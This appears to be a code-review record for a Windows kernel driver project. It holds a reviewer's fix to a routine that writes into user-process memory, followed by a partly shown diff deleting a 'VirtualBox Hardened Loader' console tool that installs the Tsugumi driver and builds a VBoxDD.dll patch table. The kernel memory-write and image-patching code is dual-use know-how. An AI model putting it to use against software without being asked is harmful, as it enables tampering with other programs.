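Review bot: HandleUserMemWrite does not release what it acquired on its failure paths: the `return STATUS_CONFLICTING_ADDRESSES` inside `__try` skips `IoFreeMdl`, and when `MmMapLockedPagesSpecifyCache` returns NULL or `MmProtectMdlSystemAddress`/`__movsb` raise, control reaches `IoFreeMdl` with the pages still locked (and possibly still mapped), which Driver Verifier flags and which can end in a PROCESS_HAS_LOCKED_PAGES bugcheck when the target process exits. Move the address check ahead of `IoAllocateMdl`, record the locked/mapped state, and perform the unmap/unlock after the `__try`/`__except` so every path releases in reverse order of acquisition; the write should also be skipped when `MmProtectMdlSystemAddress` fails instead of being attempted regardless. Separately, the chain walk in PsImageHandler only checks that a block header fits in `ConfigurationDataSize`, not that `BLOCK_DATA_OFFSET + DataLength` does, nor that `VirtualOffset + DataLength` lies within `ImageInfo->ImageSize`, so a malformed configuration block reads past the 1024-byte buffer or writes outside the target image; a guard such as `if (l + BLOCK_DATA_OFFSET + PatchChains->DataLength > ShellEnvBlock->ConfigurationDataSize) break;` before the call would close the first gap.
```c
// … unchanged: HandleUserMemWrite signature …
{
    PMDL mdl;
    PVOID mapped = NULL;       // kernel VA of the locked pages, NULL until mapped
    BOOLEAN locked = FALSE;    // set once MmProbeAndLockPages has succeeded
    NTSTATUS status = STATUS_SUCCESS;

    // Reject before acquiring anything, so the early return owes no cleanup.
    if ((ULONG_PTR)DestAddress >= 0x7FFFFFFFFFFFull)
        return STATUS_CONFLICTING_ADDRESSES;

    mdl = ShellEnvBlock->IoAllocateMdl(DestAddress, Size, FALSE, FALSE, NULL);
    if (mdl == NULL)
        return STATUS_INSUFFICIENT_RESOURCES;

    __try {
        ShellEnvBlock->MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);
        locked = TRUE;

        // Inlined MmGetSystemAddressForMdlSafe, as in the original.
        if (mdl->MdlFlags & (MDL_MAPPED_TO_SYSTEM_VA | MDL_SOURCE_IS_NONPAGED_POOL))
            mapped = mdl->MappedSystemVa;
        else
            mapped = ShellEnvBlock->MmMapLockedPagesSpecifyCache(mdl, KernelMode, MmCached,
                NULL, FALSE, HighPagePriority | MdlMappingNoExecute);

        if (mapped == NULL) {
            status = STATUS_ACCESS_VIOLATION;
        }
        else {
            status = ShellEnvBlock->MmProtectMdlSystemAddress(mdl, PAGE_READWRITE);
            if (NT_SUCCESS(status))   // never write through a mapping that could not be made writable
                __movsb((PUCHAR)mapped, (const UCHAR*)SrcAddress, Size);
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        status = STATUS_ACCESS_VIOLATION;
    }

    // Release in reverse order on every path, including the faulting ones.
    if (mapped != NULL)
        ShellEnvBlock->MmUnmapLockedPages(mapped, mdl);
    if (locked)
        ShellEnvBlock->MmUnlockPages(mdl);
    ShellEnvBlock->IoFreeMdl(mdl);
    return status;
}
```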
@@ -1,223 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2016 - 2018 -* -* TITLE: CUI.C -* -* VERSION: 1.30 -* -* DATE: 01 Aug 2018 -* -* Console output. -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -#include "global.h" - -HANDLE g_ConOut = NULL, g_ConIn = NULL; -BOOL g_ConsoleOutput = FALSE; -WCHAR g_BE = 0xFEFF; - -/* -* cuiInitialize -* -* Purpose: -* -* Initialize console input/output. -* -*/ -VOID cuiInitialize( - _In_ BOOL InitInput, - _Out_opt_ PBOOL IsConsoleOutput -) -{ - ULONG dummy; - - g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); - - if (InitInput) g_ConIn = GetStdHandle(STD_INPUT_HANDLE); - - SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); - - g_ConsoleOutput = TRUE; - if (!GetConsoleMode(g_ConOut, &dummy)) { - g_ConsoleOutput = FALSE; - WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL); - } - - if (IsConsoleOutput) - *IsConsoleOutput = g_ConsoleOutput; - - return; -} - -/* -* cuiClrScr -* -* Purpose: -* -* Clear screen. 
-* -*/ -VOID cuiClrScr( - VOID -) -{ - COORD coordScreen; - DWORD cCharsWritten; - DWORD dwConSize; - CONSOLE_SCREEN_BUFFER_INFO csbi; - - coordScreen.X = 0; - coordScreen.Y = 0; - - if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi)) - return; - - dwConSize = csbi.dwSize.X * csbi.dwSize.Y; - - if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '), - dwConSize, coordScreen, &cCharsWritten)) - return; - - if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi)) - return; - - if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes, - dwConSize, coordScreen, &cCharsWritten)) - return; - - SetConsoleCursorPosition(g_ConOut, coordScreen); -} - -/* -* cuiPrintTextA -* -* Purpose: -* -* Output text to the console or file. -* ANSI version. -* -*/ -VOID cuiPrintTextA( - _In_ LPSTR lpText, - _In_ BOOL UseReturn -) -{ - SIZE_T consoleIO; - DWORD bytesIO; - LPSTR Buffer; - - if (lpText == NULL) - return; - - consoleIO = _strlen_a(lpText); - if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) - return; - - consoleIO = 5 + consoleIO; - Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); - if (Buffer) { - - _strcpy_a(Buffer, lpText); - if (UseReturn) _strcat_a(Buffer, "\r\n"); - - consoleIO = _strlen_a(Buffer); - - if (g_ConsoleOutput != FALSE) { - WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - else { - WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - HeapFree(GetProcessHeap(), 0, Buffer); - } -} - -/* -* cuiPrintTextW -* -* Purpose: -* -* Output text to the console or file. -* UNICODE version. 
-* -*/ -VOID cuiPrintTextW( - _In_ LPWSTR lpText, - _In_ BOOL UseReturn - ) -{ - SIZE_T consoleIO; - DWORD bytesIO; - LPWSTR Buffer; - - if (lpText == NULL) - return; - - consoleIO = _strlen_w(lpText); - if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) - return; - - consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL); - Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); - if (Buffer) { - - _strcpy(Buffer, lpText); - if (UseReturn) _strcat_w(Buffer, TEXT("\r\n")); - - consoleIO = _strlen_w(Buffer); - - if (g_ConsoleOutput != FALSE) { - WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - else { - WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); - } - HeapFree(GetProcessHeap(), 0, Buffer); - } -} - -/* -* cuiPrintTextLastErrorA -* -* Purpose: -* -* Output LastError translated code to the console or file. -* ANSI version. -* -*/ -VOID cuiPrintTextLastErrorA( - _In_ BOOL UseReturn - ) -{ - CHAR szTextBuffer[512]; - DWORD dwLastError = GetLastError(); - - FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPSTR)&szTextBuffer, 512, NULL); - cuiPrintTextA(szTextBuffer, UseReturn); -} - -/* -* cuiPrintTextLastErrorW -* -* Purpose: -* -* Output LastError translated code to the console or file. -* UNICODE version. -* -*/ -VOID cuiPrintTextLastErrorW( - _In_ BOOL UseReturn -) -{ - WCHAR szTextBuffer[512]; - DWORD dwLastError = GetLastError(); - - FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPWSTR)&szTextBuffer, 512, NULL); - cuiPrintTextW(szTextBuffer, UseReturn); -} diff --git a/Source/Zekamashi/loader/cui.h b/Source/Zekamashi/loader/cui.h deleted file mode 100644 index 229124f..0000000 --- a/Source/Zekamashi/loader/cui.h +++ /dev/null 
@@ -1,55 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2016 - 2018 -* -* TITLE: CUI.H -* -* VERSION: 1.30 -* -* DATE: 01 Aug 2018 -* -* Common header file for console ui. -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -#pragma once - -VOID cuiInitialize( - _In_ BOOL InitInput, - _Out_opt_ PBOOL IsConsoleOutput - ); - -#ifdef _UNICODE -#define cuiPrintText cuiPrintTextW -#define cuiPrintTextLastError cuiPrintTextLastErrorW -#else -#define cuiPrintText cuiPrintTextA -#define cuiPrintTextLastError cuiPrintTextLastErrorA -#endif - - -VOID cuiPrintTextA( - _In_ LPSTR lpText, - _In_ BOOL UseReturn - ); - -VOID cuiPrintTextW( - _In_ LPWSTR lpText, - _In_ BOOL UseReturn - ); - -VOID cuiPrintTextLastErrorA( - _In_ BOOL UseReturn - ); - -VOID cuiPrintTextLastErrorW( - _In_ BOOL UseReturn - ); - -VOID cuiClrScr( - VOID - ); diff --git a/Source/Zekamashi/loader/global.h b/Source/Zekamashi/loader/global.h deleted file mode 100644 index 3b2667f..0000000 --- a/Source/Zekamashi/loader/global.h +++ /dev/null 
@@ -1,53 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2014 - 2019 -* -* TITLE: GLOBAL.H -* -* VERSION: 1.100 -* -* DATE: 04 Jan 2019 -* -* Common header file for the program support routines. -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -//disable nonmeaningful warnings. -#pragma warning(disable: 4005) // macro redefinition -#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union - -#if !defined UNICODE -#error ANSI build is not supported -#endif - -#if defined (_MSC_VER) -#if (_MSC_VER >= 1900) //VS15, 17 etc -#ifdef _DEBUG -#pragma comment(lib, "vcruntimed.lib") -#pragma comment(lib, "ucrtd.lib") -#else -#pragma comment(lib, "libucrt.lib") -#pragma comment(lib, "libvcruntime.lib") -#endif -#endif -#endif - -#include -#include -#include "ntos.h" -#include "minirtl\minirtl.h" -#include "minirtl\cmdline.h" -#include "sup.h" -#include "cui.h" -#include "patterns.h" -#include "instdrv.h" - -#define TSUGUMI_IOCTL_REFRESH_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0700, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) -#define TSUGUMI_IOCTL_MONITOR_STOP CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) -#define TSUGUMI_SYM_LINK L"\\\\.\\Tsugumi" -#define TSUGUMI_DRV_NAME L"Tsugumi.sys" -#define TSUGUMI_DISP_NAME L"Tsugumi" diff --git a/Source/Zekamashi/loader/instdrv.c b/Source/Zekamashi/loader/instdrv.c deleted file mode 100644 index 4335451..0000000 --- a/Source/Zekamashi/loader/instdrv.c +++ /dev/null 
@@ -1,256 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon -* -* TITLE: INSTDRV.C -* -* VERSION: 1.81 -* -* DATE: 20 Mar 2017 -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -#include "global.h" - -/* -* scmInstallDriver -* -* Purpose: -* -* Create SCM service entry describing kernel driver. -* -*/ -BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe -) -{ - SC_HANDLE schService; - - schService = CreateService(SchSCManager, // SCManager database - DriverName, // name of service - DriverName, // name to display - SERVICE_ALL_ACCESS, // desired access - SERVICE_KERNEL_DRIVER, // service type - SERVICE_DEMAND_START, // start type - SERVICE_ERROR_NORMAL, // error control type - ServiceExe, // service's binary - NULL, // no load ordering group - NULL, // no tag identifier - NULL, // no dependencies - NULL, // LocalSystem account - NULL // no password - ); - if (schService == NULL) { - return FALSE; - } - - CloseServiceHandle(schService); - return TRUE; -} - -/* -* scmStartDriver -* -* Purpose: -* -* Start service, resulting in SCM drvier load. -* -*/ -BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName -) -{ - SC_HANDLE schService; - BOOL ret; - - schService = OpenService(SchSCManager, - DriverName, - SERVICE_ALL_ACCESS - ); - if (schService == NULL) - return FALSE; - - ret = StartService(schService, 0, NULL) - || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; - - CloseServiceHandle(schService); - - return ret; -} - -/* -* scmOpenDevice -* -* Purpose: -* -* Open driver device by symbolic link. 
-* -*/ -BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice -) -{ - TCHAR completeDeviceName[64]; - HANDLE hDevice; - - RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); - wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); - - hDevice = CreateFile(completeDeviceName, - GENERIC_READ | GENERIC_WRITE, - 0, - NULL, - OPEN_EXISTING, - FILE_ATTRIBUTE_NORMAL, - NULL - ); - if (hDevice == INVALID_HANDLE_VALUE) - return FALSE; - - if (lphDevice) { - *lphDevice = hDevice; - } - else { - CloseHandle(hDevice); - } - - return TRUE; -} - -/* -* scmStopDriver -* -* Purpose: -* -* Command SCM to stop service, resulting in driver unload. -* -*/ -BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName -) -{ - BOOL ret; - INT iRetryCount; - SC_HANDLE schService; - SERVICE_STATUS serviceStatus; - - ret = FALSE; - schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); - if (schService == NULL) { - return ret; - } - - iRetryCount = 5; - do { - SetLastError(0); - - ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); - if (ret != FALSE) - break; - - if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) - break; - - Sleep(1000); - iRetryCount--; - } while (iRetryCount); - - CloseServiceHandle(schService); - - return ret; -} - -/* -* scmRemoveDriver -* -* Purpose: -* -* Remove service entry from SCM database. -* -*/ -BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName -) -{ - SC_HANDLE schService; - BOOL bResult = FALSE; - - schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); - if (schService) { - bResult = DeleteService(schService); - CloseServiceHandle(schService); - } - return bResult; -} - -/* -* scmUnloadDeviceDriver -* -* Purpose: -* -* Combines scmStopDriver and scmRemoveDriver. 
-* -*/ -BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name -) -{ - SC_HANDLE schSCManager; - BOOL bResult = FALSE; - - if (Name == NULL) { - return bResult; - } - - schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (schSCManager) { - scmStopDriver(schSCManager, Name); - bResult = scmRemoveDriver(schSCManager, Name); - CloseServiceHandle(schSCManager); - } - return bResult; -} - -/* -* scmLoadDeviceDriver -* -* Purpose: -* -* Unload if already exists, Create, Load and Open driver instance. -* -*/ -BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_opt_ PHANDLE lphDevice -) -{ - SC_HANDLE schSCManager; - BOOL bResult = FALSE; - - if (Name == NULL) { - return bResult; - } - - schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (schSCManager) { - scmRemoveDriver(schSCManager, Name); - scmInstallDriver(schSCManager, Name, Path); - bResult = scmStartDriver(schSCManager, Name); - if ((lphDevice != NULL) && (bResult != FALSE)) { - bResult = scmOpenDevice(Name, lphDevice); - } - CloseServiceHandle(schSCManager); - } - return bResult; -} diff --git a/Source/Zekamashi/loader/instdrv.h b/Source/Zekamashi/loader/instdrv.h deleted file mode 100644 index 321e916..0000000 --- a/Source/Zekamashi/loader/instdrv.h +++ /dev/null 
@@ -1,55 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon -* -* TITLE: INSTDRV.H -* -* VERSION: 1.80 -* -* DATE: 01 Feb 2017 -* -* Common header file for the program SCM usage. -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -#pragma once - -BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe -); - -BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName -); - -BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice -); - -BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName -); - -BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName -); - -BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name -); - -BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_opt_ PHANDLE lphDevice -); diff --git a/Source/Zekamashi/loader/loader.vcxproj b/Source/Zekamashi/loader/loader.vcxproj deleted file mode 100644 index 1223b33..0000000 --- a/Source/Zekamashi/loader/loader.vcxproj +++ /dev/null 
@@ -1,293 +0,0 @@ - - - - - Debug - x64 - - - ReleaseForSigned - x64 - - - ReleaseSigned - x64 - - - Release - x64 - - - - {2AFB187B-63FB-40C6-B54C-38D559E5124C} - Win32Proj - loader - loader - 10.0.17763.0 - - - - Application - true - v141 - Unicode - - - Application - false - v141 - true - Unicode - Spectre - - - Application - false - v141 - true - Unicode - Spectre - - - Application - false - v141 - true - Unicode - Spectre - - - - - - - - - - - - - - - - - - - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - loader - AllRules.ruleset - false - - - false - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - loader - NativeRecommendedRules.ruleset - true - - - false - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - loader - NativeRecommendedRules.ruleset - true - true - - - false - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - loader - NativeRecommendedRules.ruleset - true - false - - - - - - Level4 - Disabled - WIN32;_DEBUG;_WINDOWS;_SIGNEDBUILD;%(PreprocessorDefinitions) - CompileAsC - 4996 - true - false - - - Console - true - VBoxLdrMain - 6.0 - - - oscompat.manifest - - - - - Level4 - - - Full - true - true - true - Size - true - MultiThreaded - true - CompileAsC - - - true - true - Guard - false - - - Console - false - true - true - 6.0 - RequireAdministrator - true - VBoxLdrMain - true - /NOCOFFGRPINFO %(AdditionalOptions) - - - - - oscompat.manifest - - - - - Level4 - - - Full - true - true - true - Size - true - MultiThreaded - true - CompileAsC - 4996;28252;28253 - true - true - Guard - _SIGNED_BUILD;%(PreprocessorDefinitions) - false - - - Console - false - true - true - 6.0 - RequireAdministrator - true - VBoxLdrMain - true - /INTEGRITYCHECK /NOCOFFGRPINFO %(AdditionalOptions) - - - - - oscompat.manifest - - - \Certs\SignZekamashi64.cmd .\output\$(Platform)\$(Configuration)\loader.exe - - - - - Level4 - - - Full - 
true - true - true - Size - true - MultiThreaded - true - CompileAsC - 4996;28252;28253 - true - true - Guard - _SIGNED_BUILD;%(PreprocessorDefinitions) - false - - - Console - false - true - true - 6.0 - RequireAdministrator - true - VBoxLdrMain - true - /NOCOFFGRPINFO %(AdditionalOptions) - - - - - oscompat.manifest - - - \Certs\SignZekamashi64.cmd .\output\$(Platform)\$(Configuration)\loader.exe - - - - - - - - - - - - - - - - - - CompileAsC - CompileAsC - CompileAsC - CompileAsC - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/Source/Zekamashi/loader/main.c b/Source/Zekamashi/loader/main.c deleted file mode 100644 index bab620a..0000000 --- a/Source/Zekamashi/loader/main.c +++ /dev/null 
@@ -1,435 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2014 - 2019 -* -* TITLE: MAIN.C -* -* VERSION: 1.100 -* -* DATE: 04 Jan 2019 -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ - -#include "global.h" - -#pragma data_seg("shrd") -volatile LONG g_lApplicationInstances = 0; -#pragma data_seg() - -#define TsmiParamsKey L"Parameters" -#define TsmiVBoxDD L"VBoxDD.dll" - -#define T_PROGRAMTITLE L"VirtualBox Hardened Loader v1.10.0.1901" - -TABLE_DESC g_PatchData = { NULL, 0 }; - -// -// Help output. -// -#define T_HELP L"Sets parameters for Tsugumi driver.\r\n\r\n\ -Optional parameters to execute: \r\n\r\n\ -LOADER [/s] or [Table]\r\n\r\n\ - /s - stop monitoring and purge system cache.\r\n\ - Table - optional, custom VBoxDD patch table fullpath.\r\n\r\n\ - Example: ldr.exe vboxdd.bin" - -/* -* SetTsmiParams -* -* Purpose: -* -* Set patch chains data to the registry. 
-* -*/ -BOOL SetTsmiParams( - VOID -) -{ - BOOL cond = FALSE, bResult = FALSE; - HKEY hRootKey, hParamsKey; - LRESULT lRet = ERROR_BAD_ARGUMENTS; - - hRootKey = NULL; - hParamsKey = NULL; - - do { - - lRet = RegCreateKeyEx(HKEY_LOCAL_MACHINE, L"Software\\Tsugumi", 0, NULL, 0, KEY_ALL_ACCESS, - NULL, &hRootKey, NULL); - - if ((lRet != ERROR_SUCCESS) || (hRootKey == NULL)) { - cuiPrintText(TEXT("Ldr: Cannot create/open Tsugumi key"), TRUE); - break; - } - - lRet = RegCreateKey(hRootKey, TsmiParamsKey, &hParamsKey); - if ((lRet != ERROR_SUCCESS) || (hParamsKey == NULL)) { - cuiPrintText(TEXT("Ldr: Cannot create/open Tsugumi->Parameters key"), TRUE); - break; - } - - lRet = ERROR_BAD_ARGUMENTS; - if ((g_PatchData.DDTablePointer) && (g_PatchData.DDTableSize > 0)) { - lRet = RegSetValueEx(hParamsKey, TsmiVBoxDD, 0, REG_BINARY, - (LPBYTE)g_PatchData.DDTablePointer, g_PatchData.DDTableSize); - if (lRet != ERROR_SUCCESS) { - cuiPrintText(TEXT("Ldr: Cannot write VBoxDD patch table"), TRUE); - break; - } - } - else { - RegDeleteValue(hParamsKey, TsmiVBoxDD); - } - - bResult = TRUE; - - } while (cond); - - if (hRootKey) { - RegCloseKey(hRootKey); - } - if (hParamsKey) { - RegCloseKey(hParamsKey); - } - - return bResult; -} - -/* -* FetchCustomPatchData -* -* Purpose: -* -* Load custom patch table. -* Returned buffer must be freed with HeapFree after usage. -* -*/ -PVOID FetchCustomPatchData( - _In_ LPWSTR lpFileName, - _Inout_opt_ PDWORD pdwPatchDataSize -) -{ - DWORD dwFileSize; - HANDLE hFile; - PVOID DataBuffer = NULL; - - LARGE_INTEGER FileSize; - - // - // Validate input parameter. - // - if (lpFileName == NULL) - return NULL; - - // - // Open file with custom patch table. - // - hFile = CreateFile(lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); - if (hFile == INVALID_HANDLE_VALUE) - return NULL; - - // - // Get file size for buffer, allocate it and read data. 
- // - RtlSecureZeroMemory(&FileSize, sizeof(LARGE_INTEGER)); - if (GetFileSizeEx(hFile, &FileSize)) { - dwFileSize = FileSize.LowPart; - if (dwFileSize > 0 && dwFileSize <= 4096) { - DataBuffer = (PVOID)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize); - if (DataBuffer != NULL) { - - if (ReadFile(hFile, DataBuffer, dwFileSize, &dwFileSize, NULL)) { - - // Check if optional parameter is set and return data size on true. - if (pdwPatchDataSize != NULL) { - *pdwPatchDataSize = dwFileSize; - } - } - } - } - } - CloseHandle(hFile); - return DataBuffer; -} - -/* -* CreatePatchTable -* -* Purpose: -* -* Create patch table depending on installed VBox dll. -* -*/ -BOOL CreatePatchTable( - VOID -) -{ - BOOL cond = FALSE, bResult = FALSE; - DWORD dwSize, cch; - HKEY hKey = NULL; - LRESULT lRet; - TCHAR szBuffer[MAX_PATH * 2], szTempFile[MAX_PATH * 2]; - - do { - - lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), - 0, KEY_READ, &hKey); - - // - // If key not exists, return FALSE and loader will exit. - // - if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) { - cuiPrintText(TEXT("Ldr: Cannot open VirtualBox registry key"), TRUE); - break; - } - - // - // Read VBox location. 
- // - RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); - dwSize = MAX_PATH * sizeof(TCHAR); - lRet = RegQueryValueEx(hKey, TEXT("InstallDir"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize); - if (lRet != ERROR_SUCCESS) { - cuiPrintText(TEXT("Ldr: Cannot query VirtualBox installation directory"), TRUE); - break; - } - - _strcat(szBuffer, TEXT("VBoxDD.dll")); - RtlSecureZeroMemory(szTempFile, sizeof(szTempFile)); - cch = ExpandEnvironmentStrings(TEXT("%temp%\\"), szTempFile, MAX_PATH); - if ((cch != 0) && (cch < MAX_PATH)) { - _strcat(szTempFile, L"nyan.dll"); - if (CopyFile(szBuffer, szTempFile, FALSE) == FALSE) - break; - - g_PatchData.DDTablePointer = NULL; - g_PatchData.DDTableSize = 0; - if (ProcessVirtualBoxFile(szTempFile, &g_PatchData.DDTablePointer, &g_PatchData.DDTableSize) == 0) - bResult = TRUE; - - DeleteFile(szTempFile); - } - - } while (cond); - - if (hKey) { - RegCloseKey(hKey); - } - - return bResult; -} - -/* -* SendCommand -* -* Purpose: -* -* Call Tsugumi driver with IOCTL. 
-* -*/ -VOID SendCommand( - DWORD dwCmd, - LPWSTR lpCmd -) -{ - ULONG l = 0; - HANDLE hDevice = INVALID_HANDLE_VALUE; - WCHAR szBuffer[MAX_PATH * 2]; - - // Open Tsugumi instance - hDevice = NULL; - _strcpy(szBuffer, TSUGUMI_SYM_LINK); - hDevice = CreateFile(szBuffer, - GENERIC_READ | GENERIC_WRITE, - 0, NULL, - OPEN_EXISTING, - FILE_ATTRIBUTE_NORMAL, - NULL - ); - - if (hDevice != INVALID_HANDLE_VALUE) { - - RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); - _strcpy(szBuffer, TEXT("Ldr: Tsugumi device handle opened = ")); - u64tostr((ULONG_PTR)hDevice, _strend(szBuffer)); - cuiPrintText(szBuffer, TRUE); - - DeviceIoControl(hDevice, dwCmd, NULL, 0, NULL, 0, &l, NULL); - - RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); - _strcpy(szBuffer, TEXT("Ldr: ")); - _strcat(szBuffer, lpCmd); - _strcat(szBuffer, TEXT(" request")); - - if (l == 1) - _strcat(szBuffer, TEXT(" successful")); - else - _strcat(szBuffer, TEXT(" failed")); - cuiPrintText(szBuffer, TRUE); - - CloseHandle(hDevice); - - if (l == 1) { - //force windows rebuild image cache - cuiPrintText(TEXT("Ldr: purge system cache"), TRUE); - supPurgeSystemCache(); - } - - } - else { - cuiPrintText(TEXT("Ldr: Cannot open Tsugumi device, make sure driver is loaded before running this program"), TRUE); - } -} - -/* -* VBoxLdrMain -* -* Purpose: -* -* Program entry point. -* -*/ -void VBoxLdrMain( - VOID -) -{ - BOOL cond = FALSE, bFound = FALSE, bTryVBoxRestart = FALSE; - LONG x; - ULONG l = 0, uCmd = 0; - PVOID DataBufferDD = NULL; - WCHAR szBuffer[MAX_PATH * 2]; - - __security_init_cookie(); - - do { - - cuiInitialize(FALSE, NULL); - - SetConsoleTitle(T_PROGRAMTITLE); - cuiPrintText(T_PROGRAMTITLE, TRUE); - - // - // Check number of instances running. - // - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); - if (x > 1) { - break; - } - - // - // Check OS version. - // - RtlGetNtVersionNumbers(&l, NULL, NULL); - - // - // We support only Vista based OS. 
